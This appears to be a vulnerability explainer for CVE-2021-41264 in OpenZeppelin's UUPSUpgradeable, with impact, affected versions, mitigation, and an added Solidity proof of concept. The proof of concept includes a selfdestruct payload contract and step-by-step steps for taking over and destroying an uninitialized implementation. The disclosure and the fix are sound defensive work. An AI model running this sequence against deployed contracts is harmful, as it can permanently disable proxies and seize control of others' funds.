CVE-2021-41264 discloses a critical vulnerability in the OpenZeppelin Contracts library affecting versions >= 4.1.0 and < 4.3.2 that use UUPSUpgradeable. Learn about its impact, exploitation mechanism, and mitigation steps.
OpenZeppelin Contracts is a library for smart contract development. Upgradeable contracts using UUPSUpgradeable in versions >= 4.1.0 and < 4.3.2 may be vulnerable to an attack affecting uninitialized implementation contracts. A fix is available in version 4.3.2.
Understanding CVE-2021-41264
What is CVE-2021-41264?
CVE-2021-41264 discloses a vulnerability in the OpenZeppelin Contracts library related to the use of UUPSUpgradeable, impacting versions >= 4.1.0 and < 4.3.2 of @openzeppelin/contracts and @openzeppelin/contracts-upgradeable.
The Impact of CVE-2021-41264
The vulnerability is rated critical, with a CVSS base score of 9.8 (network-reachable, no privileges or user interaction required, high impact on confidentiality, integrity, and availability). In practice, anyone can take ownership of an uninitialized UUPSUpgradeable implementation contract and destroy it, which permanently disables every proxy that delegates to that implementation.
Technical Details of CVE-2021-41264
Vulnerability Description
The flaw lies in UUPSUpgradeable implementation contracts whose own storage was never initialized. Before 4.3.2 the upgrade functions (upgradeTo and upgradeToAndCall) did not verify that they were being executed through a proxy, so they could also be invoked directly on the implementation contract. Combined with an initializer that anyone can call once, this lets an attacker become the implementation's owner and run arbitrary code via delegatecall in the implementation's own context.
Affected Systems and Versions
@openzeppelin/contracts and @openzeppelin/contracts-upgradeable, versions >= 4.1.0 (the release that introduced UUPSUpgradeable) and < 4.3.2, for any deployment whose implementation contract inherits UUPSUpgradeable and was left uninitialized. Version 4.3.2 contains the fix.
Exploitation Mechanism
Under the UUPS pattern the proxy's storage is initialized through delegatecall, while the implementation contract itself is usually deployed and never initialized. An attacker calls initialize() directly on the raw implementation and becomes its owner, then calls upgradeToAndCall on the implementation (not the proxy) with the address of a contract whose entry point executes selfdestruct. Because upgradeToAndCall performs a delegatecall, selfdestruct runs in the implementation's context and removes its code. Every proxy that delegates to that implementation stops working, and since the upgrade functions lived in the destroyed code, the proxies cannot be repaired by upgrading. Version 4.3.2 adds an onlyProxy guard to the upgrade functions that requires them to run via delegatecall from a proxy whose current implementation is this contract.
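The following is an added, self-contained illustration of the mechanism described above; it is not OpenZeppelin's code. The contract names (UUPSBase, VulnerableLogic, FixedLogic, LockedLogic, Destructor, Proxy) are assumptions chosen for this example. VulnerableLogic has the pre-4.3.2 shape, FixedLogic carries the two conditions that the 4.3.2 onlyProxy modifier checks, and LockedLogic shows the workaround of leaving the implementation with nothing to initialize.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not OpenZeppelin code. Names are assumptions for illustration.
// ERC-1967 implementation slot: bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
bytes32 constant IMPLEMENTATION_SLOT =
    0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

abstract contract UUPSBase {
    // Immutable: stored in bytecode, so it holds the implementation's address
    // both when called directly and when running via delegatecall from a proxy.
    address internal immutable __self = address(this);
    address public owner;
    bool internal initialized;

    // One-shot initializer, as with Initializable. A proxy calls this through
    // delegatecall, which initializes the proxy's storage only; the implementation's
    // own storage stays uninitialized unless somebody calls it directly.
    function initialize(address owner_) external {
        require(!initialized, "already initialized");
        initialized = true;
        owner = owner_;
    }

    function _getImplementation() internal view returns (address impl) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly { impl := sload(slot) }
    }

    function _setImplementation(address newImpl) internal {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly { sstore(slot, newImpl) }
    }

    function _checkProxy() internal view virtual;

    function upgradeToAndCall(address newImpl, bytes calldata data) external payable {
        _checkProxy();
        require(msg.sender == owner, "not owner");
        require(newImpl.code.length > 0, "new implementation is not a contract");
        _setImplementation(newImpl);
        if (data.length > 0) {
            // Executes newImpl's code in the context of whoever runs this function:
            // the proxy when called through it, the implementation when called directly.
            (bool ok, ) = newImpl.delegatecall(data);
            require(ok, "upgrade call failed");
        }
    }
}

// Pre-4.3.2 shape: no check on the execution context.
contract VulnerableLogic is UUPSBase {
    function _checkProxy() internal view override {}
}

// 4.3.2 shape: only proceed via delegatecall from a proxy that currently points here.
contract FixedLogic is UUPSBase {
    function _checkProxy() internal view override {
        require(address(this) != __self, "Function must be called through delegatecall");
        require(_getImplementation() == __self, "Function must be called through active proxy");
    }
}

// Workaround for deployments that cannot be upgraded yet: leave nothing to initialize.
// Equivalent to calling initialize() on the implementation right after deployment.
contract LockedLogic is FixedLogic {
    constructor() {
        initialized = true;
    }
}

// Payload for upgradeToAndCall on an unguarded, uninitialized implementation. Delegatecalled
// by the implementation itself, selfdestruct removes the implementation's code; every proxy
// delegating to it then fails, and the upgrade functions that could fix it are gone.
contract Destructor {
    function boom() external {
        selfdestruct(payable(msg.sender));
    }
}

// Minimal ERC-1967 proxy so the legitimate path (initialize through the proxy) can be run.
contract Proxy {
    constructor(address impl, bytes memory initData) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly { sstore(slot, impl) }
        (bool ok, ) = impl.delegatecall(initData);
        require(ok, "init failed");
    }

    fallback() external payable {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            let impl := sload(slot)
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}
```

To reproduce the failure mode in a local test, deploy VulnerableLogic, deploy a Proxy with initData = abi.encodeWithSelector(UUPSBase.initialize.selector, trustedOwner), then from an attacker account call initialize(attacker) on the VulnerableLogic address itself, followed by upgradeToAndCall(address(new Destructor()), abi.encodeWithSelector(Destructor.boom.selector)) on that same address; calls through the proxy revert afterwards. Against FixedLogic the second step reverts with "Function must be called through delegatecall", because address(this) equals __self when the implementation is called directly. One caveat for current chains: since EIP-6780 (Cancun), selfdestruct only removes code in the transaction that created the contract, so the code-removal step no longer applies there, but an attacker can still claim ownership of an unguarded, uninitialized implementation, which is reason enough to apply the fix and initialize deployed implementations.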
Mitigation and Prevention
Immediate Steps to Take
Upgrade @openzeppelin/contracts or @openzeppelin/contracts-upgradeable to version 4.3.2 or later and redeploy the implementation behind affected proxies.
For implementation contracts that inherit UUPSUpgradeable and are already deployed, initialize them with trusted values immediately so that an attacker cannot claim them first.
Long-Term Security Practices
Treat the implementation contract as an attack surface in its own right: never leave it uninitialized, and verify after every deployment that its upgrade functions cannot be executed outside a proxy.
Patching and Updates
Pin @openzeppelin/contracts and @openzeppelin/contracts-upgradeable to version 4.3.2 or later and follow the library's security advisories for future fixes.